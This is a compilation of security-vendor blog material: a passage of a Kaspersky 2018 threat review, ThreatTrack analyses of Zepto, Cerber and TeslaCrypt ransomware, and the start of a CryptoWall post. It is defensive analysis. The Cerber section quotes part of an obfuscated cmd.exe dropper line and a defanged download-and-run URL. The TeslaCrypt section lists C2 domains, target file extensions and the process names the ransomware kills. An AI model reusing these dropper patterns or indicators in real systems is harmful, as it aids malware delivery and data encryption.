In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

Zepto Evasion Techniques

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.)

Zepto spam

As we dig deeper into our analysis, we found out that these macro scripts are not crafted manually. The malware authors have automated the creation and obfuscation of their code. This type of random obfuscation is one way of evading antivirus engines. As outlined below, our research highlights several methods employed to dynamically evolve the attack vector to circumvent detection.

From the malicious emails we have gathered, we will examine the attachments to analyze key differences and common characteristics.

The malicious code was written and spread across the 3 sub modules:

zepto automation

5 sub modules are being used for the malicious code:

zepto obfuscation

Examining the sub modules of the file shows that it has some common signatures that we can look for:

zepto codezepto hidden code

We were able to find blocks of code that shares common structures. Remember that these codes were found on a different part or index of the module. From programmer’s perspective, this may seem a little odd to see codes like this, but as the analysis continues, we can say that this is just one part of the malware author’s strategy to hide the code and confuse incident responders.

Notice the highlighted strings from both screenshots that are common across the two samples. At first glance, some significant strings can be formed only if the garbage strings such as:

  • “RIIM”
  • “PORKKI”

were removed or replaced, they can be formed as:

  • “microsoft”
  • “Adodb.stream”
  • “script”
  • “application”

Additionally, and maybe more significant, is the activity of these scripts. You will also notice the highlighted strings are surrounded by what we can now assume are garbage code for misdirection and to further obfuscate malicious code.

Basically, the usual flow of the scripts analyzed will go like this:

zepto infection process

At this point, the payload of the downloaded Zepto ransomware will take over.

As observed with the Zepto downloaders, the scripts also varies with the encrypted URLs. Below are some of the URLs from which the monitored scripts attempted to download Zepto. Imagine how many of them are generated and how many various structured scripts are available in the wild. Zepto is not only distributed through macro scripts, there are also JavaScrip and wsf script downloaders.

zepto download links

With some twists of social engineering, creativity and advanced programming skills, cybercriminals are becoming increasingly adept at delivering Zepto and other ransomware payloads to both business and home users.

zepto infection screen

Prevent Ransomware Infections?

To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data

VIPRE Antivirus Detections for this threat include:

  • Trojan-Downloader.O97M.Donoff.by (v)
  • Trojan-Downloader.O97M.Donoff.bu (v)
  • OLE.Generic.a (v)

Md5:
bb1ddad0780314a8dd51a4740727aba5
7e9657149c0062751c96baf00c89a57a

Reference:

Zepto Ransomware Packed into WSF Spam

Analysis by Daryl Tupaz

The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

The zip attachments contain the WSF.

infected WSF file

 

An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Zepto ransomware analysis

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, encircled above, is the number of modified files. This most indicates a high likelihood that this could either be a virus or ransomware. And considering the proliferation of ransomware attacks lately, that’s our biggest concern.

There are two captured screen shots from our analysis.

Zepto ransomware analysis infection screen

Expanding the MODIFIED FILES shows this result.

ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.

ransomware sandbox analysis

ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to mercumaya.net.

Let’s look at the two files in the Temp folder.

This is the binary view of UL43Fok40ii file

Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file.  A complete PE file format.

ransomware code processes analysis

Having only a difference of 4 bytes in size of 208,008 bytes and 208,004 bytes suggests that the file without the .exe filename extension was decrypted to form the PE executable file. Afterwards, the PE executable was run by the WSF script with the argument: “321”.

ransomware sandbox analysis

 

Expanding the Network connections.

ransomware sandbox analysis

ransomware sandbox analysis

With the com.my suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same file size of the encrypted file.

The WSF file executed by the WScript.exe simply downloaded then decrypted a Windows PE file then executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

ransomware sandbox analysis help me

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.

i

TA displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:

j1

 

This malware also renamed a lot of files. This is the behavior that encrypts files while renaming the file using a GUID filename with a “.zepto” filename suffix.

k

In the manner of searching files, it primarily targets the phone book file before traversing from the root directory of the drive.

l

Also some notable files that were created. The captured screenshot is the contents of the _HELP_instructions.bmp file.

m

This malware sample attempts to move its running executable to a file in the Temp folder.

q

With Chrome set as the default browser,  the malware opens the file _HELP_instructions.html that it previously created in the Desktop.  It also, deletes the malware copy from the Temp folder probably a part of it’s clean up phase.

o

Here’s what _HELP_instructions.html looks like when opened in a browser.

p

The process call tree under Chrome.exe are most likely invoked by the browser and not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked by using Windows Scripting Files in hopes to pass through email gateways that don’t block WSF files in attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

A Look at the Cerber Office 365 Ransomware

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection is through the use of Office macros.

This blog provides an analysis on the Cerber variant using traditional reverse-engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering in general, more often than not, requires that one gets a broad view as to what the target is doing. Whether you’re analyzing a malware sample or trying to figure what a function does from an obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look as to what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating Threat Intelligence to quickly get IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and based on those particular set of behaviors, predict if the program in question is malicious or benign in nature.

Fig: ThreatAnalyzer’s unique behavior determination engine

Fig: ThreatAnalyzer’s unique behavior determination engine

 

Fig 1: ThreatAnalyzer 6.1 in action

Fig 1: ThreatAnalyzer 6.1 in action

Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:

  1. Determine that the sample is detected as malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observers the sample trying to beacon to blacklisted URLs
    2. The sample is detected by at least 1 or multiple antivirus engine(s)
    3. Based on the behavior that it performed, has a high probability that the sample is malicious
  2. Shows the researcher/user the changes in Registry, IO (File), Network attempts it made, and processes that it spawned
  3. Compacts all detailed information that it has gathered into a downloadable PDF or XML report. If a user chooses, he can download the archive which includes the detailed report, any significant files that was generated, screenshots of the windows spawned and a copy of the PCAP file if any network activities were logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()”Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://solidaritedeproximite.org/mhtr.jpg
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1

These are highly suspicious activities given that we were trying to analyze an Office document file. The behavior above cannot be classified as normal. So the next time you’re nervous on opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.

Good ol’ reverse engineering

Office 365 Enable Content

Office 365 Enable Content

Looking at how this ransomware was coded, it will not only infect Office 365 users but users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious office attachment is opened. But this is also dependent on whether the macro settings is enabled or in earlier Office versions, security is set to low. And quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Auto-execution macro inside Cerber macro

Auto-execution macro inside Cerber macro

The macro will then proceed to the creation of a script located in %appdata%. The VBS is also obfuscated but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection. It uses the Timer function to generate a random integer and compare it to a self-generated variable, all the while; this action will be the condition when code to download the cryptor component will ensue.

Using built in network features of VBS; it will attempt to connect to a remote server and attempt to download a particular file.

httx://solidaritedeproximite.org/mhtr.jpg

This may seem harmless as it is just a simple JPG file, right? Well, the VBS code also indicates that it will write whatever the contents of that file, save it to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years ago, this seems interesting.

Download the file, save it, then Run

Download the file, save it, then Run

Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1

The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed on a separate blog. It is interesting to note that the downloaded cerber executable will encrypt your files even in the absence of internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it e.g. crytowall, locky, Teslacrypt, etc.) to encrypt the victim’s files.

Once a system is successfully infected it will display the following in the desktop.

And spawn an instance of your browser containing the message:

And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.

Infection Summary

Flow of the Cerber attack scenario

Flow of the Cerber attack scenario

  1. A spear-phishing email that contains a malicious Office attachment arrives.
  2. If the user opens the email, executed the attachment AND the macro setting for Office is set to enabled, the macro will execute spawning another VBS script.
  3. The script will contact a remote server, downloads and execute the cryptor part of the Cerber ransomware.
  4. Proceeds on scanning and encrypting the user’s files.
  5. Displays a notice that your system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

Security is Not, and Should not be Treated as, a Special Flower

My normal Wednesday lunch yesterday was rudely interrupted by my adequate friend and reasonable security advocate Javvad calling me to ask my opinion on something. This in itself was surprising enough, but the fact that I immediately gave a strong and impassioned response told me this might be something I needed to explore further… The UK … Read More

A Close Look at TeslaCrypt 3.0 Ransomware

TeslaCrypt is yet another ransomware taking the cyber world by storm. It is mostly distributed via a spear phishing email and through the Angler exploit kit. The Angler exploits vulnerability in Adobe Flash. The Angler exploit downloads a variant of the ransomware upon success.

TeslaCrypt 3.0 possesses various updates, one of which renders encrypted files irrecoverable via normal means.

Infection Indicator/s
Machines infected by TeslaCrypt will usually have the following files present in almost every directory:

  • +REcovER+[Random]+.html
  • +REcovER+[Random]+.txt
  • +REcovER+[Random]+.png

The recovery instructions for the encrypted files can be found inside these files.

TeslaCrypt ransom note

TeslaCrypt ransom note

Technical Details
Note: The file used for this analysis has an MD5 value of 1028929105f1e6118e06f8b7df0b3381.

The malware starts by ensuring it’s in its intended directory. For this sample, it checks if it is located in the Documents directory. If it’s not, it copies itself to that directory and executes its copy from there. It deletes itself after executing the copy.

The ransomware creates multiple threads that do the following:

  • Monitors processes and terminates those that contain the following strings:
    • taskmg
    • regedi
    • procex
    • msconfi
    • cmd
  • Contacts the C&C server and sends certain information like system information and the unique system ID.
  • File encryption routine

Obfuscation
TeslaCrypt is not immune to recycling code from older malware families. The initial code is an encryption of the compressed binary. Upon decryption, the malware will call the RtlDecompressBuffer API and finally write the decompressed data into its own memory.

Call to RtlDecompressBuffer

Call to RtlDecompressBuffer

The malware also uses a technique to obscure API calls by using the hash of the API name and passing it to a function that retrieves the API address.

The malware passes an API hash to a function that returns the procedure address of the API.

The same code but labeled properly in a disassembler

The same code but labeled properly in a disassembler.

File Encryption
TeslaCrypt uses AES encryption and will send one part of the key to its C&C server, which will render the files irrecoverable on its own.

It will start by checking if the system already has its own recovery key. If not, it will begin generating the necessary encryption keys. These keys will be used for the encryption routine.

Figure 5

Checks if the recovery key already exists and generates it if it doesn’t.

TeslaCrypt will traverse all fixed, remote and removable drives for files with the following extensions:

.3FR .7Z .ACCDB .AI .APK .ARCH00 .ARW .ASSET .AVI .BAK .BAR .BAY .BC6 .BC7 .BIG .BIK .BKF .BKP .BLOB .BSA .CAS .CDR .CER .CFR .CR2 .CRT .CRW .CSS .CSV .D3DBSP .DAS .DAZIP .DB0 .DBA .DBF .DCR .DER .DESC .DMP .DNG .DOC .DOCM .DOCX .DWG .DXG .EPK .EPS .ERF .ESM .FF .FLV .FORGE .FOS .FPK .FSH .GDB .GHO .HKDB .HKX .HPLG .HVPL .IBANK .ICXS .INDD .ITDB .ITL .ITM .IWD .IWI .JPE .JPEG .JPG .JS .KDB .KDC .KF .LAYOUT .LBF .LITEMOD .LITESQL .LRF .LTX .LVL .M2 .M3U .M4A .MAP .MCMETA .MDB .MDBACKUP .MDDATA .MDF .MEF .MENU .MLX .MOV .MP4 .MPQGE .MRWREF .NCF .NRW .NTL .ODB .ODC .ODM .ODP .ODS .ODT .ORF .P12 .P7B .P7C .PAK .PDD .PDF .PEF .PEM .PFX .PKPASS .PNG .PPT .PPTM .PPTX .PSD .PSK .PST .PTX .PY .QDF .QIC .R3D .RAF .RAR .RAW .RB .RE4 .RGSS3A .RIM .ROFL .RTF .RW2 .RWL .SAV .SB .SID .SIDD .SIDN .SIE .SIS .SLM .SNX .SQL .SR2 .SRF .SRW .SUM .SVG .SYNCDB .T12 .T13 .TAX .TIFF .TOR .TXT .UPK .VCF .VDF .VFS0 .VPK .VPP_PC .VTF .W3X .WALLET .WB2 .WMA .WMO .WMV .WPD .WPS .X3F .XF .XLK .XLS .XLSB .XLSM .XLSX .XXX .ZIP .ZTMP

The exception, however, is if the file contains the string “recove” or if it is found in the following directories:

  • %WINDIR% (C:\Windows)
  • %PROGRAMFILES% (C:\Program Files)
  • %COMMONAPPDATA% (C:\Documents and Settings\All Users\Application Data for Windows XP and C:\ProgramData for Windows Vista and above)
  • %LOCALAPPDATA%\Temporary Internet Files (C:\Documents and Settings\[USERNAME]\Local Settings for Windows XP and C:\Users\[USERNAME]\AppData\Local for Windows 7 and above)
Figure 6

Checking for fixed, removable and remote drives

 Once a file passes the extension check, the malware will proceed with the encryption. The ransomware variant first checks for its encryption header. If the file is not yet encrypted, it will proceed with the encryption.

Encrypted files’ headers contain data that includes – but isn’t limited to – the global recovery key, the global public key, the original file size and the encrypted data itself.

Sample of an encrypted file

Sample of an encrypted file

C&C Servers
The malware tries to connect to one of the following domains:

  • hxxp://naturstein-schubert.de
  • hxxp://csskol.org/wp-content
  • hxxp://casasembargada.com
  • hxxp://mahmutersan.com.tr
  • hxxp://forms.net.in
  • hxxp://kknk-shop.dev.onnetdigital.com

If it manages to connect to a server, it then sends a POST request using encoded data. The data it will send includes the following:

  • The shared key for the encryption
  • Bitcoin address
  • OS version
  • TeslaCrypt version
  • Unique ID for the infected system
HttpSendRequest with the encrypted data

HttpSendRequest with the encrypted data

Other Details
To ensure the malware only has one instance running, it creates a mutex as “8_8_8_8.”

Figure 9

CreateMutex function

It creates an auto start registry entry to ensure execution every startup.

Autostart registry

Autostart registry

It also adds a policy in the registry to remove permission restrictions on network drives, essentially allowing any user to access these network drives.

EnableLinkedConnections registry value

EnableLinkedConnections registry value

Interestingly enough, though, it appears the gang behind TeslaCrypt has had a change of heart and have publicly shared their master decrypt key. Before they shut down, the now-defunct payment site required a minimum of $500 in the form of bitcoin.

TeslaCrypt payment page

TeslaCrypt payment page

Advanced threat defense products like those used in this analysis help avoid ransomware infection. The advanced solutions catch the emerging threat before it can do any damage.  You’ve got two great lines of defense: The first is via email and the next is your network.

Advanced email defense solutions like ThreatSecure Email are designed to catch malware that evades traditional defenses. It’s a great tool to help stop attacks by detecting phishing links and exploits that deliver ransomware. That can stop TeslaCrypt from encrypting and taking the data from you.

The next stop is bolstering your network. Adding an advanced defense solution that identifies and correlates discovered threats with anomalous network activity is an invaluable tool to guard your data. ThreatTrack’s ThreatSecure Network, for instance, provides end-to-end network visibility and real-time detection to catch traffic hitting known malicious IPs associated with ransomware distribution and C&C.

 

The post A Close Look at TeslaCrypt 3.0 Ransomware appeared first on ThreatTrack Security Labs Blog.

The Day the Earth Stood Still for CryptoWall

It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the next level. Early ransomware used file sharing sites to upload infected files disguised as a normal file that could be downloaded by anyone. Once downloaded, it would run through the user’s machines and start encrypting the user’s data or locking their machines. So how did the CryptoWall evade our traditional defender – antivirus? We’ll break down just how CryptoWall did it:

